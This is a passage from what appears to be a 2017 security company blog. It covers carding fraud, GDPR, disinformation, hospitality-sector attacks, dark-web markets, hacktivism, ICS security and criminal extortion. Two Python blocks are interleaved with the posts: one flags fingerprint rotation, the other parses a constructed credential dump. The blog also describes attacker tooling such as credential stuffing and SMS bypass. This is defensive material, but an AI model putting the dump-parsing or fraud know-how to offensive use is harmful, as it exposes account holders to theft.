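    tz_offset_min: int   # minutes from UTC, as reported by the browser
    screen: str          # screen resolution, as reported by the browser


UA_WIN_CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/62.0 Safari/537.36"
UA_MAC_FIREFOX = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0"
UA_IPHONE = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_1 like Mac OS X) AppleWebKit/604.3.5 Mobile/15B93 Safari/604.1"


def _ev(ts: str, account: str, ua: str, lang: str, tz: int, screen: str) -> Event:
    return Event(datetime.fromisoformat(ts), account, ua, lang, tz, screen)


# Constructed sample traffic: one ordinary shopper and three accounts driven
# from the same rotating setup. Not real data.
EVENTS: List[Event] = [
    _ev("2017-11-24T10:00:00", "shopper", UA_WIN_CHROME, "en-US,en;q=0.9", -300, "1920x1080"),
    _ev("2017-11-24T10:06:00", "shopper", UA_WIN_CHROME, "en-US,en;q=0.9", -300, "1920x1080"),
    _ev("2017-11-24T10:01:00", "acct01", UA_WIN_CHROME, "en-US,en;q=0.9", -300, "1366x768"),
    _ev("2017-11-24T10:02:30", "acct01", UA_MAC_FIREFOX, "de-DE,de;q=0.9", 60, "1440x900"),
    _ev("2017-11-24T10:04:00", "acct01", UA_IPHONE, "fr-FR,fr;q=0.9", 120, "375x667"),
    _ev("2017-11-24T10:07:00", "acct02", UA_WIN_CHROME, "en-US,en;q=0.9", -300, "1366x768"),
    _ev("2017-11-24T10:09:00", "acct03", UA_WIN_CHROME, "en-US,en;q=0.9", -300, "1366x768"),
]


def fingerprint(ev: Event) -> str:
    """Hash the fingerprint components into a short device identifier."""
    raw = "|".join([ev.user_agent, ev.accept_language, str(ev.tz_offset_min), ev.screen])
    return hashlib.sha256(raw.encode()).hexdigest()[:16]


def rotating_accounts(events: List[Event], window: timedelta = timedelta(minutes=10),
                      max_distinct: int = 1) -> Dict[str, int]:
    """Return accounts that presented more than `max_distinct` fingerprints
    within any `window`, with the highest count seen. A real user may switch
    browser occasionally; three different devices in five minutes is not that."""
    by_account: Dict[str, List[Event]] = defaultdict(list)
    for ev in events:
        by_account[ev.account].append(ev)
    flagged: Dict[str, int] = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e.ts)
        peak = 0
        for i, start in enumerate(evs):
            # Distinct fingerprints in the window opening at this event.
            seen = {fingerprint(e) for e in evs[i:] if e.ts - start.ts <= window}
            peak = max(peak, len(seen))
        if peak > max_distinct:
            flagged[account] = peak
    return flagged


def shared_fingerprints(events: List[Event], min_accounts: int = 3) -> Dict[str, Set[str]]:
    """Return fingerprints used by at least `min_accounts` distinct accounts.
    One device logging in to many accounts is a classic account-takeover sign."""
    accounts_by_fp: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        accounts_by_fp[fingerprint(ev)].add(ev.account)
    return {fp: accts for fp, accts in accounts_by_fp.items() if len(accts) >= min_accounts}


if __name__ == "__main__":
    print(rotating_accounts(EVENTS))  # {'acct01': 3}
    for fp, accts in shared_fingerprints(EVENTS).items():
        print(fp, sorted(accts))      # one fingerprint shared by acct01, acct02, acct03
```

    Neither heuristic is conclusive on its own (families share tablets, and people do buy new phones), so the usual design is to feed both signals into a risk score alongside payment and shipping anomalies rather than to block outright; the thresholds here are deliberately simple constants so the logic is easy to follow.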

    Of course, there are criminals that look to exploit this interest in tool-sharing by disguising malware as carding tools. Figure 4 is an example of an actor claiming to share such tools – in this case a PayPal email checker. Unsuspecting downloaders may get more than they bargained for when downloading this .exe file. It’s a cliché, I know, but there’s no honor amongst thieves.


    Figure 4: A tool to “check email paypal” available for download and advertised on criminal forums.

    Nevertheless, with criminals so open to sharing so many tools and tactics, it’s a reminder to organizations to do the same: make use of sharing communities such as R-CISC and InfraGard to stay abreast of the latest criminal approaches.


    You can watch our webinar or download our latest whitepaper to learn more about these tactics and tools, as well as tips for retailers and consumers to follow in order to mitigate these risks.

    GDPR – Not Just a European Concern Mon, 20 Nov 2017 23:37:13 +0000

    This post originally appeared on SecurityWeek.


    The recent Equifax breach that has been all over the news raises an interesting question: How would the situation have played out if it had happened after May 25, 2018, when the new General Data Protection Regulation (GDPR) is due to come into force? While none of us has a crystal ball, we can bet the outcome for Equifax would be even worse.

    This report provides comprehensive information on the GDPR but, in brief, the GDPR is a new set of regulations to protect the personal data and privacy of citizens of EU countries. It will affect any company that processes personal data of EU citizens – even if that company doesn’t have a presence in an EU country – making this legislation more than a European concern. To begin with, the regulations set a high standard for the speed with which businesses are required to report data breaches, in some cases within 72 hours after becoming aware of the breach. Companies also have to comply with each of these rights, transparently and without cost to EU citizens:

    • Right of data portability – if a customer asks for their data you are required to provide it
    • Right of removal – if a customer requests that their information be removed from your systems you are required to do so
    • Data transfer notification – prior to sharing customer data with a third party, you must notify the customer and gain explicit consent to share it
    • Customer access requests – if a customer asks whether or not you hold data on them, you are obligated to let them know

    To satisfy the GDPR regulations, companies will likely need additional processes, technology and personnel in place. In a survey by PwC of U.S. companies, nearly 70% of respondents said they plan to spend between $1 million and $10 million to address GDPR obligations. While that may sound like a lot, it could pale in comparison to fines. Failure to comply with the GDPR can result in hefty financial penalties of up to 4 percent of global turnover or 20 million Euros (more than $23 million), whichever is greater, in certain instances. For companies operating with razor-thin margins, profits could easily evaporate into thin air.

    The need to comply with data privacy regulations is nothing new to U.S.-based companies. In fact certain states like California and Delaware have particularly strict rules around online data privacy. Further, the U.S. Department of Commerce has worked for some time to synchronize privacy legislation between the U.S. and the U.K. so that trade (mostly online) can be conducted successfully in the joint interest of both groups. This led to the creation of the EU-U.S. Privacy Shield Framework designed to give concurrency to protection, meaning the same level of protection for EU citizens whether in the EU or the United States.  Companies based in the U.S. can self-certify that they provide “adequate” privacy protection and then must comply with the Framework’s requirements.

    GDPR continues some of the core principles set out by this earlier legislation which helps ease the transition for companies that have maintained compliance. But differences including the 72-hour reporting deadline, exactly how ‘personal information’ is defined and the broader rights granted to EU citizens must be considered. So what can U.S.-based companies do to prepare for the GDPR? These five steps can help:

    1. Understand what data you have and where it is. Make sure you understand what data you hold on EU citizens.  If you don’t hold data on EU citizens then you need not concern yourself with the GDPR, but given the global nature of business this is unlikely to be the case. If you do hold EU citizen data then consider this: every company has a certain amount of data loss, yet many aren’t aware that they’ve already been breached. If you don’t already do so, proactively monitor sites on the open, deep and dark web for your customers’ information. Understanding any data leaks and addressing them now will give you a clean start when the GDPR goes into effect next year.
    2. Engage in supply chain security. Most businesses have a long supply chain. For example, it isn’t unusual for a Tier 1 financial institution to have 15,000 suppliers/partners who quite often hold proprietary information on the institution’s customers. Under the GDPR, both data controllers and data processors have protection and privacy obligations to EU citizens. Make sure your company’s security guidelines and controls with suppliers are adequate and that your suppliers are in compliance and following best practices.
    3. Complete the EU-U.S. Privacy Shield self-certification process. It is still unclear whether or not the EU-U.S. Privacy Shield Framework will continue. However, companies that are self-certified when the GDPR goes into effect can demonstrate a commitment to protecting the data and privacy of EU citizens. This puts you further down the path of compliance with the GDPR and on more solid footing to continue business with EU companies and citizens during the transition.
    4. Establish GDPR compliance processes now. You need to establish and test processes in advance to ensure you know how and who to notify in the event of a breach. With only 72 hours to spare, you can’t afford to wait and figure it out ‘on the fly.’ Additionally, make sure you have identified processes to support all the other rights of EU citizens under the GDPR including data portability, removal, transfer notifications and access requests. Consider appointing a data protection officer to oversee these efforts.
    5. Seek legal counsel. All of these changes require considerable thought, time and effort. Before you go too far down the path of implementing processes and any supporting technologies required, seek professional legal advice to ensure that your chosen approaches suitably address the legislation.

    Crystal ball or not, it’s clear that the GDPR is not just a European concern. What’s not yet clear is how quickly or severely the Information Commissioner’s Office will treat non-compliance in the early part of the legislation. Regardless, given the scope of requirements, affected U.S.-based companies should start to prepare now to mitigate risk.

    Fake News is More Than a Political Battlecry Thu, 16 Nov 2017 23:25:03 +0000 This week, British Prime Minister Theresa May came out and attacked Russia’s attempt to “weaponize information” in hostile actions against western states. This comes on the back of a wave of news that’s covered “fake news” and the U.S. elections. At the latest count, Russia-linked Facebook posts reached 126 million users during the U.S. election period. This makes great headlines and fascinating reading, but what does it all mean?

    We must remember that the use of social media bots is nothing new. Nor is influencing elections; even using social media to influence the outcomes of elections isn’t particularly new.

    Our latest paper covers four areas:

    1. Disinformation is different than fake news;
    2. Disinformation campaigns have financial motivations too;
    3. There are a wide range of tools available, which extend beyond social media;
    4. Understanding these motivations and tools allows us to disrupt disinformation campaigns.



    Let’s get a boring, semantic (yet important) clarification out of the way. Fake news and disinformation are different, albeit related, terms. The confusion between the two terms holds us back from having a sensible conversation.

    Fake news refers to all manner of things, including disinformation campaigns, partisanship, and honest journalist errors. Disinformation campaigns are specifically those that deliberately spread false information in order to deceive their target or audience.

    One of the greatest quotes on this comes from the former Director of Department X for the East German foreign intelligence: “Our friends in Moscow call it ‘dezinformatsiya’. Our enemies in America call it ‘active measures,’ and I, dear friends, call it ‘my favorite pastime.’”

    This need not be limited to the geopolitical sphere; it can apply to ideological and financial motivations too.


    It would be wrong to assume that the sole target of disinformation campaigns is the electorate and political parties. Given how easy it is to access and wield these online tools, organizations can easily be slandered and their share prices can change. We’ve seen such activities already, particularly surrounding BioTech companies and accusations about the role of Martin Shkreli and an online actor named Art Doyle.

    Actors might not even need to get into the weeds of these tools. TheInsider is a dark web “Pump and dump” service that encourages users to invest in their scheme. The scheme itself looks to manipulate interest in cryptocurrencies to pump up the price and sell shares for profit.


    Disinformation TheInsider

    Regardless of the motivation behind disinformation campaigns, these do not happen in isolation. Instead, malicious actors take advantage of a wide range of tools available with a very low barrier to entry.


    Digital Shadows’ Disinformation Campaign Taxonomy is based on a three-stage attack chain (creation, publication, and circulation), which includes an overview of the methods, tactics and tools associated with running such an operation.

    Taxonomy of Disinformation

    By using Digital Shadows’ Disinformation Campaign Taxonomy, we can see that there are different stages that defenders can target to help disrupt disinformation campaigns in their infancy. Early identification of these campaigns is critical to increase the likelihood of successful disruption.

    Download a copy of our latest research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.

    Why “Have a Safe Trip” Is Taking On Greater Meaning Tue, 14 Nov 2017 23:19:04 +0000 This post originally appeared on SecurityWeek.

    Have a safe trip! Typically, when we wish someone well before they leave on a journey we are referring to their physical safety while in transit. But, increasingly, there’s another consideration – their online security.

    Over the past year, compromises of payment card data from Point-of-Sale (POS) systems, network intrusions against third-party suppliers, and cyber espionage campaigns against visitors using hotel Wi-Fi networks have plagued the travel and hospitality industries. In the spirit of “forewarned is forearmed,” let’s take a closer look at some of the most notable examples of each of these types of threats and how firms in these industries can mitigate risk.

    POS attacks:

    Financially-motivated actors seeking to compromise payment card details use malware to extract this data from POS systems or devices, as well as physical skimming devices. Judging by the 20 POS malware variants that have been documented and numerous reports of breaches, the travel and hospitality industries have been under siege. In the last six months alone, a new variant, MajikPOS, has emerged, along with modifications to the RawPOS variant and to the Zeus banking trojan that target POS systems. Since August 2016, POS attacks have reportedly affected 37 Best American Hospitality Corporation restaurants, 62 Kimpton hotel locations and an unknown number of Chipotle Mexican Grill locations. Threat actors focused on these industries include FIN7, TA530 and Vendetta Brothers, who each use a range of tactics, techniques and procedures (TTPs). As an example, the threat group FIN7 targets the hospitality industry through the following TTPs:

    • Spearphishing emails containing malicious Microsoft Office documents
    • Social engineering methods to ensure targets open an attachment and initiate the infection process
    • Macro-enabled documents that download initial backdoor payloads onto recipient machines to allow for continued access to systems
    • Malware to move laterally through compromised networks

    Network intrusions:

    The most high-profile network intrusion in the past year involved a compromise of the Sabre Corporation, reportedly affecting at least eight hospitality companies. Through unknown means, the attackers had obtained account credentials that permitted access to payment card data and information for some reservations processed by Sabre’s central reservation system. The company stated that not all compromised records included CVV numbers, and that no personal information, such as social security numbers, passport numbers, or driver’s license numbers, was accessed. This attack demonstrates a trend of third-party supplier attacks, in which financially-motivated actors impact multiple companies by compromising their supplier to access sensitive or valuable data.

    Wi-Fi network compromise:

    Threat actors have also targeted hotel Wi-Fi networks in an information gathering and cyber espionage campaign against travelers to Europe and the Middle East. Threat actors almost certainly choose to target these networks because they are deemed less secure and can be leveraged to perform additional actions, such as stealing credentials and moving laterally within networks. In this particular campaign, spearphishing emails were used to deliver information-harvesting malware to victims. The attackers also purportedly used the EternalBlue exploit, which targets the vulnerable Microsoft Server Message Block (SMB) protocol, for lateral movement within target networks.

    So what can you do to mitigate risk?

    Layer security:

    • While the Europay, Mastercard and Visa (EMV) chip technology has made physical card fraud more difficult, online card spending is on the rise. Consider using 3D Secure, deployed by Visa and Mastercard, as an additional layer of security; it has proven to be a real obstacle for criminals.
    • To prevent lateral movement once inside the network, restricting workstation-to-workstation communication by using host-based firewall rules is also encouraged where feasible.
    • Implement an enterprise password management solution – not only for secure storage and sharing but also strong password creation and diversity to mitigate the risk of credential compromise.


    • With the help of Google Alerts or open source web crawlers like Scrapy, monitor for mentions of your company on cardable websites (sites that track those that are susceptible to fraudulent purchases as a result of lax security controls).
    • Monitor for mentions of suppliers’ names on the open, deep and dark web to help identify if key partners are being targeted by threat actors and if such activity may put your organization at risk.
    • Proactively monitor for credential dumps relevant to your organization’s accounts.
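    As an added example (not code from the original post), here is a small Python scanner that applies the credential-dump monitoring point above: it reads a constructed dump, keeps only accounts under domains the organization is assumed to own (ORG_DOMAINS is an assumed value), ignores look-alike domains, de-duplicates repeat entries, and records only a truncated hash of each password rather than the plaintext.

```python
"""Flag entries in a credential dump that belong to an organization's domains.

Added example, not code from the original post. The dump lines below are
constructed for illustration; ORG_DOMAINS is an assumed list of domains the
organization owns. Plaintext passwords are never stored or printed: only a
truncated SHA-256 of the password is kept, which is enough to tell whether
the same account turns up with a new secret in a later dump.
"""
import hashlib
import re
from collections import Counter

# Assumed: the domains the organization owns (matching includes subdomains).
ORG_DOMAINS = ("example-hotels.com", "examplehotels.co.uk")

# Dumps are usually "email:password", but separators vary between sources;
# accept ':', ';', '|', a tab or a single space between the two fields.
_LINE_RE = re.compile(r"^\s*([^\s:;|]+@[^\s:;|]+)\s*[:;|\t ]\s*(.+?)\s*$")


def org_domain_for(email):
    """Return the owned domain an address falls under, or None.

    A suffix match on the dotted boundary keeps sub.example-hotels.com in
    and leaves example-hotels.com.evil.test (a look-alike) out.
    """
    domain = email.rsplit("@", 1)[-1].lower().rstrip(".")
    for owned in ORG_DOMAINS:
        if domain == owned or domain.endswith("." + owned):
            return owned
    return None


def parse_line(line):
    """Split one dump line into (email, secret); None if it is not a credential."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def credential_fingerprint(secret):
    """Truncated hash used to compare leaks without retaining the password."""
    return hashlib.sha256(secret.encode("utf-8")).hexdigest()[:12]


def scan_dump(lines):
    """Return (hits, per-domain counts, number of lines that were not parseable)."""
    hits, seen, unparsed = [], set(), 0
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            if line.strip():
                unparsed += 1
            continue
        email, secret = parsed
        owned = org_domain_for(email)
        if owned is None:
            continue  # not one of our accounts
        fp = credential_fingerprint(secret)
        if (email, fp) in seen:
            continue  # same account and same secret already recorded
        seen.add((email, fp))
        hits.append({"email": email, "domain": owned, "fingerprint": fp})
    counts = Counter(h["domain"] for h in hits)
    return hits, dict(counts), unparsed


# Constructed sample dump: mixed separators, mixed case, a duplicate,
# an unrelated domain, junk text and a look-alike domain.
SAMPLE_DUMP = """\
alice@example-hotels.com:Winter2017!
bob@mail.example-hotels.com;hunter2
carol@unrelated.example:letmein
Alice@Example-Hotels.com:Winter2017!
dave@examplehotels.co.uk|Passw0rd
this line is not a credential
erin@example-hotels.com.evil.test:notours
""".splitlines()

if __name__ == "__main__":
    hits, counts, unparsed = scan_dump(SAMPLE_DUMP)
    for h in hits:
        print(f"{h['email']:40} {h['domain']:22} {h['fingerprint']}")
    print("per domain:", counts, "unparsed lines:", unparsed)
```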


    • Routinely train employees about the risks of spam and spearphishing and how to avoid becoming a victim.
    • Because employees often reuse corporate credentials for personal use, establish and communicate policies that restrict which external services may be associated with corporate email accounts. Encourage staff to use consumer password management tools like 1Password or LastPass to manage personal account credentials as well.

    Address vulnerabilities:

    • Patching is an important part of your defense strategy and failing to do so opens the door wide for adversaries. For example, Microsoft has issued a patch for the vulnerabilities exploited by EternalBlue. Application of these patches prevents the exploitation of the SMB network service.
    • Proper configuration is also critical. In the case of the SMB service, TCP port 445 should not be reachable from the public Internet; where external access to SMB is required, a VPN or IP address whitelisting should be used to restrict access. SMB traffic should, ideally, not be permitted to egress from an organization’s network to the public Internet.

    As long as payment card details and other proprietary information remain lucrative on criminal forums and marketplaces, the travel and hospitality industries need to remain vigilant. But with greater awareness of POS system attacks, operations against third-party suppliers, and the vulnerabilities of public or semi-public Wi-Fi networks, companies can do a lot to mitigate risk and ensure safer journeys for travelers.

    Know Where to Find Your Digital Risk Fri, 10 Nov 2017 22:12:23 +0000 This post originally appeared on SecurityWeek. Read more from CEO Alastair Paterson.

    Approximately 250 years ago Samuel Johnson said, “The next best thing to knowing something, is knowing where to find it.” This is quite a fitting quote from the author of A Dictionary of the English Language and equally fitting today when it comes to understanding your digital risk.

    There’s a great deal of intelligence organizations can find on the deep and dark web. Credit card numbers, bank account information, patient information and intellectual property are widely known to be for sale on forums. Some of the intelligence is more eye-opening: we’re seeing W-2 forms and employee credentials available, making any organization ripe for tax fraud or account takeover, respectively.

    One of the most popular marketplaces on the dark web for such information is AlphaBay. Not only is information related to a company’s assets available, but information about new techniques to compromise targets is for sale as well. One of the latest is a tool to bypass SMS account verification, making multi-factor authentication that relies on SMS vulnerable. On such forums you can also find configuration files for credential stuffing tools, like Sentry MBA, that are created for account takeover of specific companies. There are dozens of marketplaces on the dark web and competition for business is fierce. In fact, some less popular marketplaces offer botnets devised to spam AlphaBay users with advertisements or special promotions in an attempt to entice them to switch forums. Not all dark web sources are as readily accessible as AlphaBay, of course. Some require human analyst expertise to gain access to closed sources and obtain the most relevant view of the risks.

    But for all the notoriety of these marketplaces, it is also important to remember that criminal activity isn’t limited to the dark web, particularly given the fact that some countries don’t extradite cybercriminals. With minimal consequences, bad actors have no incentive to hide. As a result, cybercrime is an Internet-wide problem, almost equally present on the deep and open web. is a prime example. This all-in-one outsourced online shop provides hosting, design (based on WordPress-like templates) and a payment solution. Additional items for sale on the marketplace include:

    • Bot-registered social media accounts (usually sold in bulk), typically with the intent of supporting social media spam and artificially increasing the popularity of other accounts/posts
    • Stolen, legitimate social media accounts, which are advertised in small quantity but at higher prices compared to bot-registered accounts
    • “Coupons” to services that artificially increase the popularity of social media accounts or posts
    • Stolen accounts from other services including banks, payment, and gift and loyalty cards
    • Dedicated servers and domain names

    The point is that criminal forums exist everywhere so focusing only on the dark web won’t give you a comprehensive view of your digital risk. Furthermore, it isn’t enough to simply detect mentions of company assets and concerns. You need context behind the information you see posted to have a better understanding of the actual risk to your organization. This requires a combination of technology and people.

    • Automated collection technology can provide visibility into incidents with context, as they happen, wherever they happen – across the open, deep and dark web. For example, being able to see previous posts by other users on the same marketplace thread or post can provide a deeper understanding of how your company, employees or customers may be impacted. It can also provide an overview of the user in question, with their name, date joined, activity levels and reputation.
    • Data scientists and intelligence experts are able to gain access to some closed sources that collection technology alone can’t penetrate and they need to be involved in qualifying the data collected. With enhanced analytic capabilities and additional context they can help determine the potential impact to the organization, a possible timeline of events, and recommended action.

    A comprehensive assessment of your digital risk starts with knowing where to find it. With an approach that combines technology and human experts looking across the open, deep and dark web, you can understand not only where and when you are mentioned online, but also why, by whom and the likely impact to your organization. This breadth and depth of coverage is essential to protect against threats associated with forums and marketplaces and, ultimately, to formulate a successful digital risk management strategy.

    Pwnage to Catalonia: Five Things We Know About OpCatalunya Thu, 02 Nov 2017 21:00:08 +0000 Since October 24th, Digital Shadows has observed an increase in attack claims and social media activity associated with the OpCatalunya (OpCatalonia) hacktivist campaign. Given the ongoing tensions between Catalonia and Madrid, we expect online activity to continue for the next few weeks at least. Here are five things all organizations with operations in Spain need to know about the campaign:

    1. What is OpCatalunya?

    OpCatalunya was established in late September 2017 by affiliates of the Anonymous collective in response to ongoing political and social tensions between the Catalonian autonomous community and Spain’s Madrid government. Catalonia held an independence referendum on October 1st that was subsequently declared “illegal” by the Spanish government. Although we observed a small number of references to the hashtag OpCatalunya on social media before late September, these were not related to the current hacktivist campaign of the same name and instead pertained to long-running tensions between the region and central government, which date back to the nineteenth century.

    2. Who is Involved? 

    Although the campaign is most closely associated with the Anonymous collective, particularly its Spanish iteration (Anonymous Spain), other hacktivist actors and groups, including Shadow Sec team, Team Poison, F Security and other branches of the Anonymous collective such as Anonymous France, Anonymous Albania, Anonymous Belgium and Anonymous Germany, have either taken part or pledged their support.

    3. What Activity Have We Seen?

    The campaign initially called for attacks against Madrid-based government and law enforcement websites; however, there has been a widening of targeting to include education, media, and financial services organizations across Spain. As well as several denial of service (DoS) and data leak attacks against Madrid government sites, Anonymous Spain made DoS attack claims against the Spanish royal family’s website and that of Real Madrid Club de Fútbol, the latter due to its historic ties to the royal family and former Francoist regime. Other supporters of the campaign called for attacks against media companies perceived as providing partisan and anti-Catalan reporting, including El Mundo, Marca, El Pais, Pris and Grupo Planeta. Organizations that do not primarily operate out of Madrid have also been targeted; we detected DoS attack claims made against Banca March, a Spanish bank headquartered in Palma de Mallorca. There were also data exposure attacks conducted against websites belonging to the University of Malaga and Federation of Canary Islands, as well as a defacement of the Faculty of Sciences at the University of Cordoba website.

    Given the political and nationalist motives of this campaign, social media activity for OpCatalunya was strongly influenced by developments on the ground. The rise in attack claims in the second half of October 2017 occurred alongside a surge in social media mentions of OpCatalunya and its associated hashtags. Social media mentions grew dramatically following an announcement on October 19th by the Madrid central government that direct rule would be imposed on Catalonia.

    OpCatalunya Twitter activity for Oct 2017

    4. Am I At Risk?

    As targeting for this campaign has expanded beyond government and law enforcement, we assess that all Spanish organizations principally operating out of Madrid are at increased risk of attack. Moreover, OpCatalunya supporters are often opportunistic and not necessarily focused on organizations ostensibly aligned to the central state. Therefore, all organizations with Spanish operations are likely seen as potential targets, though the success of such attacks would often depend on the security posture of these organizations, with attackers typically conducting data exposure attacks and website defacements against low-hanging fruit.

    Although very few foreign companies have been targeted thus far, attackers may eventually move towards high-profile internationally recognized targets operating in Spain as a means of further publicizing their cause, particularly given the current impasse over Catalonian independence. The threat to foreign companies would also increase if they were perceived to have close affiliations with Madrid authorities – for example by publicly denouncing the Catalonian right to self-determination, displaying positive sentiment to the actions of central government, or threatening to move business operations out of Barcelona.

    Despite displaying high levels of intent, the capability of OpCatalunya participants is typical of most hacktivist campaigns, primarily consisting of relatively unsophisticated data exposure attacks (likely conducted via SQL injection techniques that are popular among hacktivists), website defacements and DoS attacks. Therefore, the capability of OpCatalunya participants is assessed as low to moderate at the time of writing.

    5. What Else Can We Expect?

    OpCatalonia supporters have explicitly expressed their desire to conduct further attacks, namely a DoS attack against Spanish Internet infrastructure on November 12th. While no further information was provided by the OpCatalonia Twitter account, Internet service providers (ISPs) operating in Spain would be the most probable targets.

    OpCatalonia Twitter announcement

    OpCatalunya has already garnered the support of other participants from the wider Anonymous collective and beyond. We may see additional groups lend their support to the campaign, either out of solidarity for nationalist independence movements or to further their own cause. Forbes published an article on October 16th that claimed the Russian state was actively supporting Catalonian independence to sway public opinion in favor of its annexation of Crimea in 2014, which Russia maintains was a legitimate independence movement from Ukraine. While we detected no indication that Russia or other nation state actors had attempted to influence the Catalonian independence campaign through cyber activity, the prospect of this occurring in the future is a realistic possibility.

    Digital Shadows has put in place a dedicated monitoring capability for this campaign. We will update accordingly should there be any significant change in targeting or increase in activity.

    ICS Security: Strawmen In the Power Station Tue, 31 Oct 2017 20:53:56 +0000 Congrats, it is now almost November and we have nearly made it through Cyber Security Awareness month (and what a month it has been). The theme for this final week is: “Protecting Critical Infrastructure from Cyber Threats.”

    For the purposes of this blog, I want to discuss two strawmen views of Industrial Control Systems (ICS) Security which, unfortunately, are both prevalent in many discussions around the topic of critical infrastructure protection:

    1. Doom’n’Gloomers: this is the “sky is falling” view of ICS security, often held by people with an IT security background, who are appalled by the lack of patches, outdated operating systems and lack of traditional IT security controls.
    2. Airgappers: this is the view that ICS security is in a good place due to the airgapped nature of ICS systems and attackers’ lack of understanding of the complexities of those systems.

    My opinion is that both views are partially accurate, that the reality of ICS security is nuanced, and that an appreciation of that nuance is essential for making security decisions about those systems.

    A recent study claims that “One third of OT [Operational Technology] networks are exposed to cyber attacks” mainly due to the ICS systems having some form of internet connectivity, usage of unpatched or unpatchable systems and lack of encryption for passwords. These are all valid concerns. Which strawman argument is right, Doom’n’Gloomers or Airgappers? There are arguments on both sides:

    1. Almost all systems require some degree of internet connectivity in the modern era. While airgaps sound desirable due to their strong security properties, there are serious challenges to their usage: they cannot be updated, the data they collect cannot be exported and they cannot be remotely debugged in case of an issue. In a statement before the Subcommittee on National Security, Homeland Defense, and Foreign Operations in 2011 Sean McGurk, the Director of the Control Systems Security Program, stated that: “In our experience in conducting hundreds of vulnerability assessments in the private sector, in no case have we ever found the operations network, the SCADA system or energy management system separated from the enterprise network.” Despite the absence of complete airgaps, ICS networks are often firewalled or segmented off from the main enterprise network. Frameworks like NIST 800-82r2 and centers like CPNI (Critical Protection of National Infrastructure) have guidance around the deployment of firewalls for ICS systems, for example. We hope this guidance is followed.

    2. The continuing use of Windows XP past its End of Life is a concern, because newly discovered security vulnerabilities are not being patched. Even though Microsoft issued an emergency patch for the ETERNALBLUE exploit (MS17-010), its deployment in ICS systems is likely not widespread due to the difficulties involved with patching systems where availability is the key concern. These systems do have vulnerabilities. But the ease of exploitation of these vulnerabilities is not as often discussed. ICS systems often have physical security controls; for example, they may only be accessible from rooms which have physical access control and closed-circuit television (CCTV). Unfortunately, many support contracts do not allow companies to upgrade or modify software without vendor approval, thereby extending the time required to patch.

    3. Legacy equipment which is incapable of encrypting passwords, or the misconfiguration of equipment which is capable, is certainly an issue. However, as mentioned previously, access to control networks is not as straightforward for an attacker as access to the enterprise network. While there are some ICS systems which are connected to the Internet, it is rare to find the Human-Machine Interface (HMI) for a power station easily accessible. Often, they are connected to other systems via leased lines or a VPN. Additionally, the knowledge and skills to compromise an ICS system itself, rather than its surrounding IT infrastructure, are rare. Robert M. Lee and others helpfully distinguish intrusions into ICS systems into two steps: Step One, Network Access, and Step Two, Operation Access. Compromise of the enterprise network would be Step One. Access to the operational networks, Step Two, followed by actually being able to use that access, has been publicly documented in only two cases: Stuxnet and BlackEnergy/CRASHOVERRIDE. While such attacks are a concern, they are far from an everyday occurrence.

    One final point which is worth bearing in mind is the level of monitoring of ICS systems that is typically in place. Power stations and other safety-critical systems are monitored closely by operators, and response procedures are also present. Even in the case of the attack against the Ukrainian power network in December 2015, the power was out for a maximum of 6 hours before the Prykarpattyaoblenergo Company successfully restored power.

    As with many issues in cyber security, we see an evolutionary arms race playing out between attackers and defenders, with each side attempting to gain the upper hand. As for our strawmen, both have their good points; they should remind us of the strengths and weaknesses of ICS systems, together with a cautionary note not to be complacent.

    Extorters Going to Extort: This Time Other Criminals Are the Victims Thu, 26 Oct 2017 15:52:27 +0000

    We are increasingly used to the tactic of extorting a company by threatening to publicly release its data. The recent HBO extortion attempt is a prime example, and actors like thedarkoverlord have also used this approach extensively. Digital Shadows has tracked well over 20 thedarkoverlord extortion attempts since June 2016. The process is straightforward enough: acquire a company’s valuable data, threaten to release the data if a ransom is not paid, and then put pressure on the victim by sharing the data with journalists. But cybercriminals also face this risk themselves. In this case, a criminal marketplace is the victim of an extortion attempt. Is there any trust left in criminal marketplaces?

    Fig 1 – An advertisement for basetools on another criminal forum


    On October 24th, a user posted on Pastebin claiming to have accessed customer details and administrator accounts of Basetools, an online criminal marketplace. The user also claimed to have obtained personal details of the administrator and demanded $50,000 in ransom, or he would release further information and the dox of the administrator. The post threatened to inform law enforcement should the payment not be made. At the time of writing, the Basetools market was “under update” and claimed it would be back in “a few days”.

    Fig 2 – The message received when accessing Basetools on 25 October 2017


    Basetools is a criminal marketplace that is often advertised within Russian-speaking criminal forums and marketplaces. The site allows vendors and buyers to trade credit card information, customer accounts, and spamming tools. The site claims to offer over 150,000 accounts, 20,000 tools and 24/7 support.

    Fig 3 – A screenshot provided by the extortionist, claiming to show access to the admin support panel

     One motivation behind the threat is clearly financial, but that does not tell the entire story. The actor claims that the administrator of the site has been manipulating the vendors, creating false personas and falsely elevating those vendor profiles to the top of listings.


    What’s the Impact?

    For many years, the criminal marketplace – whether that is on the dark or deep web – has been the preserve of cybercriminals, allowing them to easily advertise and sell their illicit goods. However, this has experienced a significant shift in the past 4 months with the demise of AlphaBay and Hansa marketplaces.

    We have previously forecast the potential shift from centralized marketplaces to more decentralized models, and the conditions that would have to exist for this to become a reality. The attempted extortion of Basetools, and in particular the allegations of an admin manipulating vendor ratings, is yet another reason for cybercriminals to reconsider the idea of a centralized market. In a decentralized model, the risk of this occurring would be reduced.

    While the conditions for a decentralized model taking the lead may not yet be there, this may take us one step further. In future posts, we’ll be looking at the recent adoption of the decentralized model and the implications of it.

    Women in Security: Where We Are And Where We Need To Go Wed, 25 Oct 2017 15:34:27 +0000 Ada Lovelace, Grace Hopper, Katherine Johnson, Radia Perlman—some of history’s greatest technical minds have been women. However, since the mid-1980s, there has been a devastating decline in the number of female computer science and engineering graduates. This is even more clearly reflected in the modern workforce—especially within Information Security.

    Source: Pixabay

    While women make up nearly half of the American and European workforces and 40 percent of it worldwide, according to the ISC2 2017 Women in Cybersecurity report, only 11 percent of global Information Security professionals are women. Many women also have difficulty moving up in their careers, despite reporting higher education levels and qualifications than their male counterparts. Furthermore, at all levels, men also earn more than women, are nine times more likely to be promoted to managerial roles, and four times as likely to hold C-level positions.

    Source: Center for Cyber Safety and Education


